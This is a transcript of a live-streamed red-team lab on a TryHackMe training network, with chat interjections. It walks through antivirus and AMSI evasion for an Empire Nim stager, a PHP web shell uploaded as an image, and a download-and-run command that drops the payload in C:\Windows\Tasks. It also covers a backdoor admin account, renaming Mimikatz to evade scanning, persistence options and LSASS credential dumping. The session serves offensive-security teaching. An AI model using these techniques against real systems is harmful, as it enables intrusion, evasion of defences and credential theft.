Uh-oh. Well, that sucks, doesn't it? What is this? Unable to invoke specified member. Unfortunate. Oh, no. Oh, no. Did we break something? This was the original agent. This is not the... let me just... This is the agent that we got when I ran it. Yeah. So this one is dead. We did not get a new agent. Don't freak out. Everyone, calm down. Calm down, everyone. Al still got you. Okay? Notice I'm not concerned. Do I look concerned? Do I look concerned? Do you see concern in my eyes right now? Do you see molding? No. What's happening? Put your thinking hats on. What is happening? Or what do you suspect is happening? It gets past Windows Defender, but it doesn't execute. Why? Well, I want you to think about this. I want you to... Ghost! Ghost is correct. Ghost is correct. When you load an unmanaged PowerShell run space, AMSI.dll is loaded into it. We are still subject to AMSI. Even if this static executable does not... Even if this static executable does not trigger Windows Defender, when it executes, AMSI is loaded into the process. And when that malicious string is attempted to be invoked, it will trigger AMSI. So AMSI is pretty much always going to be present. If you're going to be executing PowerShell, there's basically no way to do it without having AMSI in your way. So we need to remove AMSI. AMSI needs to go take a long walk off a short cliff. Okay? Which we can do. We demonstrated this last time, don't we? Didn't we? Can we not just do the same thing again? We can. We certainly can. So, let's delete this. Let's go back into our NIM. Let's go back into our NIM. So, AMSI is initialized when this run space is created. I know this because, again, I've fucked around with this a little bit. So AMSI is loaded into the process when this run space is created. So it is not initialized when the pipeline is created. This is key. That's because, so if we try to, let's first try to do it. Let's try to do it the way I know is not going to work. Let's do var yog. For our good friend, Yog Sothoth. Cousin to Dread Cthulhu. Where are my notes? We can use that AMSI bypass that I used last time. This is in my cheat sheet. AMSI. This is the C# version. That's the encoded C# version. Where's my PowerShell version? It's down here somewhere. Right here. So this one gets caught now. F's in the chat for this guy. But this bad boy still is kicking. This is an obfuscated version of the classic AMSI init failed AMSI bypass. It is an obfuscated version of that. If you want to see the original version, you can just Google AMSI init failed, probably. AMSI init failed. We click on this, we'll probably see. Yeah, here's the original string right here. You're loading AMSI.utils inside of the audit. You're loading this the AMSI utils type, and then you're setting the AMSI init failed field to true. This is a field that gets set whenever AMSI is loaded into a process. It tells the process whether or not AMSI loaded correctly. So if you change this to true, it means that the process is going to assume AMSI failed to load and will not send things to scan it. It will not send things to AMSI. So this is a simple AMSI bypass. This is a obfuscated version. This is an obfuscated version of that. It's just hex encoded. You can see that the strings have been hex encoded here. And then I do a little for loop to chain them together dynamically at runtime and turn them back into what they're supposed to be. Unicode, 16-bit Unicode, etc. And then yeah, there you go. So this bypass still works. We tested this on Thursday, and it does in fact still work. So we can paste this right in here. Okay, we'll put triple quotes around it because that's like that makes sure that everything in here is going to be a string, and we don't have to worry about escaping all the double quotes and so on and so forth. Okay, so let's come down here, and now for the pipeline, we can do pipeline.commands.add script yog. So we're going to execute the AMSI bypass before we execute the script, or before we execute the actual payload, and then we're going to invoke. Okay. That should work just fine. Or at least it should compile. Let's go ahead and start the server back up again. Let us suppose I scan the file by online service. Did they deduct it? It's possible. Like, so it's well known that if you use online services to scan your antivirus, like VirusTotal, the antivirus vendors look at that. They look at VirusTotal and the files that are uploaded to them for new malware, so that they can update their stuff. So you really don't want to upload your custom tools to VirusTotal if you want it to be. It's great for blue teamers. It's fantastic for blue teamers for analyzing malware. But for red teamers, really not a good idea. Unless you want to constantly be writing new tools because antivirus keeps somehow catching on to it. Mysteriously. Let's connect to localhost server. Cuckoo is good for that kind of shit. Or cuckoo is how it's pronounced. Let's use Stager, Windows NIM. Set listener default HTTP, and then execute. Okay, it looks like it is compiling. It's good news. We didn't break anything. Yep, it's compiling. NIM code does take a few seconds to compile, usually, because it needs to be converted into C first, and that takes a little bit. So it did. It looks like it did do that. So let's go ahead and go back over to here. Let's pull down launcher.exe. And let's try executing it. Again, against Windows Defender. Uh-oh. Still doesn't work. So I knew this was going to happen. So what happens is when the way that these unmanaged PowerShell run spaces work is they work on pipelines. So these work in pipelines. So when we invoke this pipeline, we're invoking it all at once. So we're invoking all, like, this script is basically just being appended to the end of this for simplicity's sake, and then is being invoked all at once. So AMSI is still flagging on our malicious string because it hasn't yet been unhooked. Does that make sense? These two strings are basically just being added together, and the malicious parts of this string are still being caught because AMSI has not yet unhooked. We need to invoke this script first and then this one. Does that make sense what we need to do? We need to invoke this script and then invoke this script so that we can unhook AMSI and then execute the script. Right now, it's being executed all at once. Okay? So, fortunately, this is easy enough to do. We could just make another pipeline. We can make more than one PowerShell pipeline here. So, if we we create the run space, and we can, let's call this one var pipeline 2. Pipeline 2, pipeline 2. Okay. Let's do var pipeline 1 equals, we're going to create a different run space, or a different pipeline, same run space. Pipeline 1.commands.add script yog. Okay, and then we need to invoke that pipeline. So pipeline 1.invoke, and then we set up the second pipeline, and then we invoke that one, and that, I think, should be fine. Let's do that. Is this Python or Go? It's NIM. It's an obscure programming language called NIM. Okay. Let's go back to main. Disconnect. Exit. Okay. Start that back up again. Let's go ahead and rm launcher.exe. Okay. Just to make sure we're not playing with old executables. If anything goes wrong here. Okay. So now we can connect taxi localhost. Okay. And then we use stager Windows nym. Set listener default HTTP. And then we execute. Okay. Seems to be compiling. Good news. I like things that compile. Okay. And now, let's pull this down. Let's go over here. Let's pull it down. Launcher.exe. Let's verify it still gets past Windows Defender. Via threat check, no threat found. That's a good fucking sign. And there we go. Now, Empire produces nym payloads that bypass Windows Defender. And that's without any additional obfuscation. Keep in mind, you could add additional obfuscation with Empire's built-in functions, and it would still and it would make it even harder to decode. Let's make sure it actually executes stuff before I get too excited. It does. Dunzo funzo. Threat check can be used with tacky EMSI. Yeah, you could try you could try to you could try that against AMSI. It would still flag. It would flag because it's actually I don't think it would because it's not getting decompiled. It's not executing. It's just, you can try tacky AMSI to see what happens. Yeah, the base 64 is not getting decoded. Like, the malicious string, keep in mind, is base 64 encoded. Why are we getting threats? What threats have been found? Oh, it's actually flagging on, it looks like it's flagging on threat check. It didn't flag on... Did it flag on threat check? What is it flagging on? No? Is our agent still running? Yeah, agent's still running. It looks like it was flagged. It looks like threat check got flagged for trying to use AMSI to test the executable or something. Does that make sense? Now, that was, again, a very simple version of encoding. That was very, very simple. But you can see how the techniques I used can be applied to make much more complex encoding and make your executables much more evasive. Now we just need... Yeah, exactly. We could still get flagged in post-exploitation. I actually think we're still running inside of... AMSI is still unhooked. I think that we're still running in the same PowerShell process. The agent is running in a PowerShell run space that AMSI has been unhooked from. So I don't think AMSI... I think we'll have an easier time in post-exploitation. But does anybody have any questions about that? We're going to go back into Holo now, and we're going to see how well this executable does for us. Okay? You want to go back and let's go back into Holo and see how well this new nym payload works. As soon as we also unhook ETW. Yeah. I mean, that's an option that's available in Empire itself, Husky. I purposefully didn't turn it on because, again, I wanted to do all this manually. Let's get caught up. We're gonna field test this stuff here in just a second. Unnamed comment with the 9 months. Welcome back. Excalibur bringing Fieldsbra into the passionate club of cephalopod enthusiasts. Welcome. Cyber Payload, thanks so much for the 100 Tig-Gold biddies. Jifram with the 69 Tig-Gold biddies. And Cyber Payload with another 100 Tig-Gold biddies. And Volrath with the 4 months. Thank you so much, my friend. You guys are all so generous to me. Thank you so much for helping me help you. Unknown Toasty, Ian Tree, Mamo Boit, Ninkazi, Lunacy Termite, and Hell MD, I guess. Hell MD 411, thank you for the follows. Cthulhu Cthursday to you, my friend. Oh yeah, the fucking white background. I keep meaning to add like a semi-transparent layer behind this to make it easier to read against the white background. I just haven't done it yet. Does anybody have any questions about any of the stuff we just did? Again, you could use Empire's if you use Empire's built-in functionality for obfuscating, I bet you could get it past Windows Defender, but not AMSI. The key thing is, well, actually, it might have gotten past AMSI. If you obfuscated it enough, you'd have gotten it past AMSI. I bet you just using Empire's default obfuscation methods, you could have gotten that past AMSI. If disabling AMSI is noisy, how would you create and operate malware to avoid that? It's not noisy. AMSI is not noisy. Or disabling AMSI is not noisy. Not that I know of. Other red teamers in chat can feel free to correct me. There's multiple ways to unhook AMSI, the developer. I'm only showing you one example. There's multiple examples of what you can do to remove AMSI as a factor. As long as you don't execute any strings that get flagged by AMSI itself, disabling AMSI is pretty quiet. All you're really doing is changing a single flag within the memory of a program. That's it. That's it. Time for bed. Have a good night, Angel D. Stream mod with bringing Victo into the passionate club of cephalopod enthusiasts. Welcome to the All Has Red team. Follow in your games. Thank you for the follow. So, let's field test this against Holo, shall we? All that bypassing has made me hungry to own an actual box. So let's go ahead and... Oh, I didn't mean to start the attack box. Shit. I meant to start this. So we start this up, and it might... so the server... this stuff needs to start up. We don't need this. Terminate. Okay. So we're going to wait for this to start up. I'll move this over here. This advertisement for NIM was amazing, though. Yeah. I really like NIM. I'm a fan of it. The documentation is bad. Certainly, it's bad if you're dealing with any kind of low-level functions, like dealing with Windows API calls and unmanaged PowerShell run spaces. There's nothing online about how to do an unmanaged PowerShell run space in NIM except for offensive NIM. That is it. I did so much Googling about it. Nobody else has anything on it except for offensive NIM. If you Google unmanaged PowerShell NIM, you'll get offensive NIM as your #1 response. So NIM is not very well documented. That is because it's not a very well-known programming language and not many people use it. That's also a strength. Marcelo, he did. Bite Bleeder is super good. He showed us that way. He showed us the way there. I wanted to use it for game hacking to learn about it. Again, it is hard to learn, especially if you're doing low-level functions. It is hard to learn. It's not undocumented. Like, there is documentation. It's just not as good as other languages. The way it exports NIM main 24/7 is sussy. It doesn't do that by default. It doesn't do that by default. Or does it? I know it doesn't export DLL main. If you compile a DLL, it's not going to export DLL main by default. Alrighty. So, let's go ahead and kill the agents. Kill all. And let's make sure before I do anything else, listeners, options, default HTTP. Before we do anything, we need to fucking fix this problem because I'm not having this issue again. Let's connect to the TryHackMe Al-Hazred Holo Live. Connect to the VPN. Are there any other good resources for making your own code to bypass Windows Defender? You do what I just did. Mamo boy, the reason I did it this way is that there isn't a hard and fast way to do it. Bypassing antivirus is about trial and error. You obfuscate your code, you make a change, you test it against Windows Defender, you see what part of the file is flagging, and then you go back and you tweak some more stuff again, and then you try it again, and it's just a trial and error dance. That what I showed you is exactly what people really do when they're trying to bypass antivirus. It's a game of trial and error every single time. So that was very basic. That was a very basic way of bypassing AV. But that basic method will get you very far. If you can apply the method that I just did, it'll get you very far until you start talking about endpoint protection hooking, and stuff like that. Why isn't there an event that gets triggered when AMSI is disabled? Well, keep in mind, all that's changing is like 1 byte. Like, you're changing like 1 byte in the memory of a process. We're talking about gigabytes of RAM, all of which is constantly in flux. Keep in mind what endpoint protection is looking at. And what Windows is looking at. You're looking at RAM, which is programs take more RAM all the time. Gigabytes of RAM. We're talking 10, 20 gigabytes of RAM on the low end that are in use. And you're changing 1 byte. You're changing a single byte into one of the many instances of AMSI.dll that's currently loaded. Like, I understand it's frustrating to defenders that there isn't like an alert that pops up, a siren that goes off in your SOC, and like an Amber Alert on your phone when AMSI is unhooked from a process. But understand what level of challenge Windows has in flagging on things like that. Like, it's 1 byte of memory that's being changed. That in gigabytes, thousands. In gigabytes, millions of bytes of code.
A hunter must
Do you save
hunt.
your streams, or will today be on the
Do
tubes?
you
Today,
save your streams?
Or
will today be on the tubers?
Good question. The current modus operandi now is to 24 hours after every stream, I restream the same exact stream on YouTube. So I will be doing the same stream on YouTube tomorrow. It'll be the pre-recorded version. It'll be this stream pre-recorded. Okay, that we just did. And that way, Windows saves my VODs. The VOD will be saved on YouTube. YouTube saves my VODs in perpetuity that way. So yeah, this stream will be on YouTube as of tomorrow. Okay. We can get rid of this. We are done modifying Empire for today. Hopefully. Knock on wood. If config ton 0, what's our IP address? 10.50.134.50. So we want to change our host to that IP address. This is the problem I had last time. Set host. Is it set option or something? Help. Edit listener. Oh, we have to disable the listener first. Disable default HTTP. Now we edit listener, default HTTP. Set host 10.50.134.50. Okay, let's show options again, just to make sure it got changed. It did. Good. So now we have Empire that should work as intended. Help. We want to enable the listener. Okay, cool. So let's get back into Holo now. So we do have credentials for that Linux machine. We don't have to do the crazy Docker container shit anymore. We have credentials, Linux rules for the Linux admin user, I recall. So let's SSH into 10.200.137.33. It needs to be Linux admin at that. Oh. Just remove my known hosts file and try it again. Yes. And the password is like Linux rules or something. Yeah, Linux rules. A very strong password.
Hey Al. Gonna start OSCP/Pen200 soon, and I have a bunch of notes from like 50 HTB boxes. Do you index your notes like IPsec when you do a box so it's easily referenced?
Yeah.
Plan is to have a working index so when I...
You can have it. You have my notes right here. You can see on the side. I'm not always all that great at taking notes, like not on stream. Off stream, I take notes much better. On stream, I'm typically worried about talking with chat and then doing the hacking and stuff. So I'm not as concerned about taking notes on stream. But you can see I've got all kinds of notes on boxes that I've done, challenges that I've worked on, and things of that nature. So yeah, I do think there's a lot of value in maintaining all your notes like that. Job Avoider, thanks for the 7 months. Welcome back to the All Has Red team, my friend. Jifram, thanks for the 69 take gold biddies. Stream Mod with the 3 months.
Must hunt.
Thunderdogs and RWX Lucas, thank you for the follows. Do we need to recompile the stager? No. Nope. We'll have to generate a new stager, that's for sure. So first we need to put Chisel up here. Do we have sudo privileges on here? We don't really need them, but Linux rules with a Z may not run sudo. We don't really need it anyways. We're good. We have Docker. There's Docker with an SUID binary. If we need to get to root, we know how to do it, is what I'm trying to say. We don't need root, though. We can simply... We'll just make a directory here. This is obviously not, like, the most... this is obviously not the quietest. I'm writing stuff to disk or whatever, but it's fine. We need Chisel because we need to pivot. If you want more information on this stuff, go ahead and check out my previous streams on Holo Live. I've gone through this a couple of times now. We're just going to pull Chisel down. Curl http://10.50.134.50, I believe is my IP address. Chisel. TAC capital O Chisel. Could not resolve host. 10. Wait. What is my IP address? Maybe my...
With your SSH access at Al4ZR3D, we're going to pivot over to SSH socks.
Oh, we could just use SSH.
All the way home.
Good call. Good call. We could just use SSH. I've just used Chisel the other streams. We could certainly use SSH. You're absolutely right. So we can do ~C here. ~C. And we can do TACD to start a dynamic port forward. And I guess it's just TACD 1080, isn't it? For like port 1080? I think so. Hopefully I'm right about that. If I'm not, we'll find out very shortly. Netstat. Let's make sure 1080 is listening. It is. So we're doing a dynamic port forward with SSH, which establishes a SOCKS proxy for us. Sudo vim. There are some advantages to doing this with Chisel versus a SOCKS proxy. Chisel uses a SOCKS 5 proxy, and I believe that the SSH one is SOCKS 4a, which means it doesn't do UDP. So UDP will not be proxied, but I don't think we need to proxy UDP here, so I don't think it's a problem. It's vodifyproxychains.conf here. That is correct, but it needs to be a SOCKS 4 proxy. Now we can proxy chains. And, yep, that is the correct IP address. And we do get it. Okay, so we successfully can reach this host now. SSH used SOCKS 5 when I specified it in proxy chains? Okay, well, now I have to look it up. Let's look it up here. Is it a SOCKS 4 or a SOCKS 5? It is SOCKS 5. Okay, well, it does work with SOCKS 4. I think all you're doing is telling proxy chains not to send UDP traffic if you use SOCKS 4. We don't need UDP, so it doesn't really matter. You see, we can pivot through the host now. If we remove proxy chains and try to reach out to that host, try to nmap scan that host, we will see that we don't see that port open. Yeah, so that port's not open now. But if we pivot through proxy chains, we can now reach that host. So, what did we do to? Wasn't there? There was some web-based vulnerability. I think we're gonna need Burp. Burp Suite can use an upstream. The easiest way to use an upstream SOCKS proxy is to use Burp. In my opinion, just go through Burp, and Burp will put all your traffic to an upstream SOCKS proxy if you configure it correctly. Or Zap. I'm not sure if Zap can do an upstream SOCKS proxy. I'm sure it probably can. Realistically speaking, it probably can. But I'm sure that you have to go through 10 poorly designed menus to figure out how to do it. Whereas I can just go into options. I can scroll down. I think it's in user options, actually. Yeah, SOCKS proxy. So we have it using a SOCKS proxy right now. Let's set it on proxy, intercept. Intercept is off. And let's pipe to Burp. And now let's travel to 10.200.137.31. Okay. Oh yeah, we reset the password of the Gurag user, if I remember right, who we had found on a previous host. We reset the password, and then if I remember right, if I remember correctly, we can just hit inspect element here.
FBI, open up!
Oh god, they're on to me again. I keep doing it by accident. I keep hitting F12, guys. You gotta watch out for me. The FBI, they're on their last nerve with me using F12, okay? Okay, so we'll do that. This is the token, by the way. In Wonder of Unspeakable Wonders, the token of the password reset token is set as a cookie for some fucking reason. So we can just put this here. And now it's enter username, enter new password. So we can Gurag. We just set a new password, update. And we set the password. It gives us a flag for that. Now we can go back and log in. Log in. All right. So, yeah, here's your Ubus and your Vohiyos. We can upload... We're totally going to We're going to upload a total image. Totally an image. Okay? This is totally, definitely going to be an image. And definitely not going to be random PHP code. So we're going to upload that. File's been uploaded. Is there an uploads directory? There's not. Or is it images? Is it images, perhaps? Images. I remember it was an easily guessable directory. Yeah, images seems to be correct. Is this cached? Why is it not executing? It's not executing my command. Why? Let me look at my Python, or my PHP shell. Echo Cthulhu fhtagn and system. It might be cached. I bet you it's cached. So let's go ahead and delete my Firefox cache. Clear data. Clear. There we go. Let's try to load it now. And we still don't get it. Oh, because it's fucking Windows. I did the same problem last time. It's fucking Windows. ID is not a command on Windows. There we go. And we are a very secure user to be running a web server. Very secure. Oreo Bite, thanks for the 69. Tiggle biddies, by the way. All right, so we are, again, running as an extremely secure user. Okay, so let's go ahead. Let's send this to repeater. Let's change request method. And let's execute a whoami command this way. It should work with post requests. It does. All right. Now let's go back over here. Use stager. Windows nim. Field test time. Are you fuckers ready for a field test? I hope you're ready, because I am. What was it? Var lib. Yeah, here we go. We were born ready? We absolutely are. We absolutely are born ready. Set listener. Oh, it's already set. I'll set it anyways. And then we just execute this. And it should make... It should compile our modified version of this stager. Now, a couple of considerations when you're downloading a file onto a host and you don't know what's running on the host. A couple of considerations here. Most notably, we want to be cognizant of where we're putting the file. The place where we put the file needs to have two features. Number one, it needs to be, well, three features, I guess. Number one, it needs to be a place that's writable by our current user. Since we're running as NT authority system, we can write anywhere, pretty much. So that shouldn't really be a concern. Number two is, number two is we don't want to put it on a user's desktop or anything in case they see a random file pop up on their desktop or something like that. We just want to make sure we're not putting it somewhere like that. But why would we want to use C Windows Tasks? Why is C Windows Tasks a good place? Husky is recommending that, and I agree that's a real good place to put it. But why? Husky, don't answer. Let these degenerates answer. Why is C Windows Tasks a good place to put it? Or C Windows Temp? Temp isn't as good. It's not always writable. Gunez, you're almost right. You're almost right. Not quite, but you're almost right. what other defensive measures might be in place on the target other than Windows Defender? There might be there's other App Blocker. Perfect. App Blocker. App Blocker is commonly enabled on Windows these days. App Blocker prevents certain executables from running from certain locations. But the default rules specify that any folder within C Windows is not restricted by App Blocker. Okay? This isn't a problem unless there are folders within C Windows that are writable by anybody. Which C Windows Tasks is one of those folders. C Windows Tasks is usually writable by everybody, by design. And it's within the C Windows folder. So this is a common App Blocker bypass. We don't know if App Blocker's in operation. I suspect it is not. Because this is meant to be sort of for beginners. Like a beginner lab. More or less. But still, it's worthwhile to keep it in mind. Okay? Alright, so CMD equals PowerShell. .exe. Tac C. We'll do wget. Hopefully wget works. Wget http://10.50.134.50. Port 81. Let's rename launcher.exe to something less obvious. Sudo vim or move launcher.exe. We'll call it Cthulhu.exe. Probably want something innocuous. Cthulhu.exe is pretty innocuous. Cthulhu.exe. Tac O, Cthulhu, C, Windows, Tasks, Cthulhu.exe.
A hunter must
Seems
hunt.
okay. We can include tac no profile, tac exec, bypass, tac W, hidden, all that normal crap. We can base 64 encode, or we can URL encode. Excuse me. We can start our web server. We run. We do get a call. Okay. We did not get an agent because we didn't execute it yet. All I did was download it. Okay? All I did was download it. And now we're going to execute it. So cmd.exe /c C Windows tasks Cthulhu.exe. And there we go. It's just that easy, friends. It's just that easy. It's just that easy. Now, actually, I want to test something just for funsies. And I'm going to do that in here in just a second. So we noticed that Empire includes this little percent, this little asterisk. That indicates that it's running a system. You're running in an elevated process. When will this VOD be available? It'll be restreamed on YouTube, and then it'll be on YouTube in perpetuity. Tomorrow, as in tomorrow, the VOD will be available. Oink Doink, thank you for the Prime re-indoctrination into the passionate club of cephalopod enthusiasts. Thank you so much. Nemesis545, thank you for the follow. The VOD is going to be up on Twitch as usual as well. Not so. EMP Rip Old Name, Green Spock, Microservice, and Not So Blah. My friends, you have been given the greatest of all gifts. You've been indoctrinated into our happy little cybersecurity club that is not a cult by Jifferam. Thank you so much, Jifferam190, for your continued and concerted support of the stream. Thank you so much. So we're going to try something else here. Use Stager. Let's just pick a different one. Not Nim. Launcher Bat sounds fine. We'll do that. it probably will still get caught by MSI, which is unfortunate. Let's do it. Let's not do this. Let's do back. I wanted to... I'm curious... List. Let's do this. Do I have Mimikatz? Like the actual executable? I do. Yeah, here it is. X64. Yeah, that works. Mimikatz will work for my purposes. What is this? What is all of this? Oh, that's just the SSH. Okay. Pay no attention. I just want to see if this works. I'll explain what's happening here in just a second. How is Mike Rocco doing? As far as I can tell, he's doing much better. He doesn't seem to be in pain as much anymore, at least. That's good. How do I execute a command? Interact. Who am I? We are system. Help. Is there like a shell? Shell. Yeah, task specified agent, so it's just shell and then shell command. So we can do... let's do this over here. Instead of Cthulhu.exe, let's do dumpstack.log. And if you're wondering why I'm choosing that very specific name, I will make it clear to you in just a second. Okay. We did get a GET request. Let's use proxy chains for... Let's do free RDP. Oh, right. I have to... Real quick, let's go ahead and add shell net user alhazred Cthulhu 1 exclamation point add. Oh, I think it's... Maybe I have to put it in quotes. Let's put it in quotes. Maybe it's failing because... There we go. Okay. And then shell net user alhazred... Or net local group administrators. Administrators. Alhazred add... Shell net local group remote desktop users alhazred add okay. Hopefully that executed correctly. And I see chat speculating as to why I'm doing this. I'll make it very clear here in just a second. I don't know if it's going to work. I'm just curious if it will. Let's go ahead and connect to RDP. It'll be clearer if we do this via RDP. Okay, we're logging in via remote desktop. It should work. I think it will. I think it actually will. I'm just curious if it will or not. And then after I get it to work, if it works, after I do this, I will explain what I am trying to do. Let's just open up cmd.exe. Run as administrator. Okay. Dumpstack.log is there. Remember, that's our mimikatz.exe. Okay. Oh my god, it does work. That's fucking hilarious. Windows Defender, what are you doing? That's fucking hilarious. This is an unmodified mimikatz.exe. This is a completely unmodified mimikatz.exe. I got this idea from this tweet. It looks like it may have been killed in memory. It looks like Windows Defender is onto Mimikatz in more than just one way. It looks like Mimikatz got killed in memory, which is normal. It's not intercepting, is it? Oh, I'm using an upstream Strox proxy you can't reach. Yeah, the proxy, I forgot burp is going through an upstream Strox proxy. Let's do this. So, if you name a malicious file dumpstack.log, Defender doesn't scan it. So, all you have to do, this is no longer the case, by the way. I tried this on my dev box, and apparently Microsoft fixed this a couple of days back. But this is an isolated network, and Windows Defender doesn't have the latest updates. So I thought that this might work, and it actually does. That's very funny to me. The second tweet was about doing the exact same thing with DLLs. Yeah, so it's subject to other methods of detection. So Mimikatz gets caught in memory, which is normal. It will get caught in memory. It's not it's anything with .log. Well, the reason I think that is because log files tend to be very large, and Windows Defender tends to not like to scan large files. So yeah, maybe consider naming your malware .log. Yeah, so I just wanted to see if that would work. It's very funny. Okay, it's quite funny. So does anybody have any questions about that? Anybody have any questions? It's just a little fun thing that I thought we would do there. Did we put in the flags for this? Okay, so we need to pivot from here. Let's see if we can get caught up on the interesting. It looks like there's some... What is happening here? Is it doing some client-side? Only accepts JPEG files. I didn't run into this at all. It looks like it's doing some client-side It's doing some client-side file whitelisting. But that's dumb because you can just disable JavaScript. Don't do any whitelisting client-side. That's dumb. AV evasion. Okay, it talks about antivirus, AMSI. Okay, we figured out how to get past AMSI. Where's Al? All I see is a hot snack. Yeah, I get that a lot. Okay, so it's doing... it's talking about exactly what we talked about, right? It's talking about various AMSI bypasses. This is that bypass string right here. This is that bypass string that we used. And you can obfuscate this, and they're talking about how you can obfuscate it and all this good stuff. And it looks like this is a different way of executing the same thing. using get proc address. Yep. And you get module handle of AMSI.dll, and then you get the address of AMSI utils, and change AMSI scan buffer using this. This is a different way of doing this. I'm going to put this in my notes, just for kicks and gigs. That's a different way. This is a different way in PowerShell of doing the exact same thing. Next time we do If You Laugh, You Lose, you'll have another chance to get the Oreo tank top. I'm sure that the Oreo tank top will happen at some point. Don't worry. I'm just putting that into my notes because, or that other way of executing that AMSI scan buffer string. Yeah, because it's less signatured. And I like that a lot more. Okay. Have a good night, Just a Guy. Thanks for being here. Alrighty. AMSIception. Okay, so they're actually going through the same process that we did. But they're using, they're obfuscating it with Covenant. They want you to create a working AMS. So we actually did everything. We just did it with Empire, which is cool. And they're talking about invoke obfuscation. This is a great tool. Invoke obfuscation.ps1 is a fantastic tool for obfuscating PowerShell. Oh my god, it's so good. I use invoke obfuscation on real assessments. I highly recommend this for obfuscating PowerShell scripts. It's super good for that. Okay. Okay, I mean, using it on Cobalt Strike even is good. I use it to modify my Cobalt Strike scripts. How much harder is it to thwart Windows Defender APT than the standard version? Much harder. Windows Defender APT is very competent. Just about any red teamer will tell you that one of their most notorious enemies is Windows Defender ATP. It's tough. Windows Defender ATP is very wily. It knows it catches stuff. It's much more competent. They even use threat check. They're even using threat check. So I accidentally went through all of the correct things. We submitted the flags. We did all of this. Okay. Yep. Okay. So now we want to run, since we're running, now they're talking about Mimikatz, which is fine. But it's going to get caught by Windows Defender. So we need to execute Mimikatz a different way. Will you ever do a stream going over it? Yeah, I can if you'd like. I'm not going to do it right now. I'd like to get a little bit more of Holo in. But I can do another stream where I talk about invoke obfuscation. Maybe that'll be a Patreon content, actually. Maybe that'll be Patreon content. Defense APT evasion. I would like to make Patreon content on DLL sideloading. I would like to do a DLL sideloading walkthrough, like how to compile a malicious DLL, and then use DLL sideloading to load it when somebody starts up Teams or whatever. Will the AMSI bypass log version of Mimikatz? It depends on if AMSI is actually listening or not. All right, so let's go back to our agent. So we're operating inside of an agent now. So at this point, I wonder if Mimikatz will work. Let's see if Mimikatz works. Let's see if Mimikatz works. It may kill my agent. I'm hoping it doesn't. "17 seconds ago. It looks like it did kill my agent. Fuck. Okay, so Mimikatz. It is going to kill your agent if you try to run Mimikatz. Oh, wait. No. It did not. It's just slow. What is happening? It checked in. Okay, it says job started. And it says now it may be killed. Is it killed now? Oh, this is my debugging. What am I even looking at? I'm looking at this. Let's see if Windows Defender caught anything. It might just be taking a while to execute. Yeah, sometimes the output is slow. That is true. It could very well be that the output is just slow. Manage settings. It doesn't seem like it's flagging anything. No current threats. But now the agent is not checking in. Again, it might just be slow. I'm actually curious. I don't know how evasive the Mimikatz module in Empire is. Oh, here it is. Oh no, this was the one that it quarantined. No, this was our dumpstack.log one. It's not, I mean, it's not listing that it's not saying there was a threat. But the agent is no longer checking in. So I think that our agent is dead. Which is unfortunate. Okay. Okay, so that works again. So mimikatz.exe is fairly evasive. I don't really want to obfuscate mimikatz.exe. I'm kind of done with obfuscation right now. Is there like a module? Is there like a module version of Mimikatz that I can run that will be sneakier? I just don't want to go through the whole process of obfuscating mimikatz.exe or anything like that. How would you add persistence to this agent? Good question. So typically, you would either you could. There's lots of methods of adding persistence, but you could you could install it as a service and have it start whenever the machine boots. You could install your beacon stager as you could put it in the registry as in one of the many run keys. There are a lot of registry keys that list off files that are executed whenever the machine boots up or when a user logs in. So whenever a user logs in, you could execute beacon your agent stager. You could use a WMI event subscription. That's a common method of persistence. DLL sideloading is also a method of persistence. You could use a normal .dot file in Microsoft Word if Microsoft Word is being used in the target environment. Lots of stuff you could do. So do we still have... We have this agent, don't we? Yeah. Okay, back. List. So yeah, it looks like that agent is dead. Even though Windows Defender did not list any problems. I'm just going to go ahead and disable Windows Defender here. I normally would not do this on a real operation. But at this point, like, normally on a real operation, I would already have pre-obfuscated versions of all of these things. I don't have any of that stuff right here. So rather than going through the laborious task of obfuscating every single thing that I run, I'm just going to disable Windows Defender so we can get on with the interesting stuff, because we've done enough AV evasion today, I think. So we'll go ahead and disable Windows Defender. I just want to get on with the interesting things. Do you have a pre-made modified version of Mimikatz? Oh, I've modified Mimikatz many, many times. I don't know if my current version will get past Windows Defender. I normally load Mimikatz's DLL into memory like reflectively. That's how most of the time when you execute Mimikatz, you'll use it. That's the sneakiest way to use it. I just don't want to go through all that stuff right now. It's a little bit more advanced than I'm looking to do on this particular, like, beginner situation. So we can just run Mimikatz. So our agent hopefully will not die this time. Oh, come on. Is the Mimikatz module just broken? Oh, no. Now it's checking in. Okay, it's checking in. All right. How do I view the command output? Is it just going to get displayed to me? What is happening here? I just want to view the command output. Yeah, it just gives me the tasks. I don't know how Empire works here. Like, how does it give me the command output? Keylog. Like, come on, dude. There's no way this is taking this long. There's no way Mimikatz takes this long to run. Oh, now it's not. Now this one isn't checking in either. Is the Mimikatz module just busted? What? I guess is the Mimikatz module just completely broken? Like, we disabled Windows Defender. Defender did not flag on it. I think it's just broken. Very odd. Are we seeing any of our beacon processes running? No, they're still running. Our agents didn't die. The Mimikatz.exe is just not loading. So it looks like it appears that Mimikatz.exe, that the Mimikatz version, that the Mimikatz module here does not work, which is unfortunate. That is very unfortunate because it kills our beacons. The beacons hang. All right, let's just terminate these. I don't want to keep starting up identical processes. So you see, we're kind of like, this is kind of why I don't want to go through I don't want to worry about antivirus right now, because I don't, partially, at this point, I don't know if antivirus is breaking something, or if the beacon is just breaking, or if the agents are just busted. Let's just run Mimikatz here. We still have dumpstack.log. Oh, it's been deleted. It's been deleted. So let's go ahead and run, let's download it again. Okay, let's execute dumpstack.log, and we'll talk about Mimikatz now. So, what is Mimikatz? What is Mimikatz? Mimikatz, it's a lot of things now. Mimikatz can do a lot of stuff. It's evolved into a kind of catch-all tool for Active Directory exploitation. It can even exploit things like zero logon and things of that nature. Mimikatz can do a lot of stuff now, but its original function was accessing the LSAS process to dump Windows credentials out of memory. Does that make sense? Like, so what is the LSAS process? LSAS. What is the LSAS process? The Local System Authority Subsystem Service. LSAS. The LSAS process contains login information contains login information for all the users that are currently logged into the machine. Whenever you log into something, if the credentials are stored in LSAS, in the LSAS process in memory. So you can access the LSAS process, you can access the LSAS process and dump the credentials out of there. I'm going to show you 2 ways to do this, okay? I'm going to do it the regular Mimikatz way, to demonstrating it right here, and I'm going to do it the way I'd actually do it on an assessment, which in fact will bypass antivirus. Well, procdump 64. I guess Empire doesn't have a module for it, does it? Empire probably doesn't have a module for it, so I'd have to use procdump 64. Which I think will get caught by antivirus if you do it against lsas.exe. Procdump 64 is a Windows sysinternals executable, so it's trusted, but if you use it to dump the LSAS process, Windows Defender will flag it. But I'll show it both ways regardless. Okay, I'm going to show it both ways. So the first thing you need to do is that Mimikatz needs 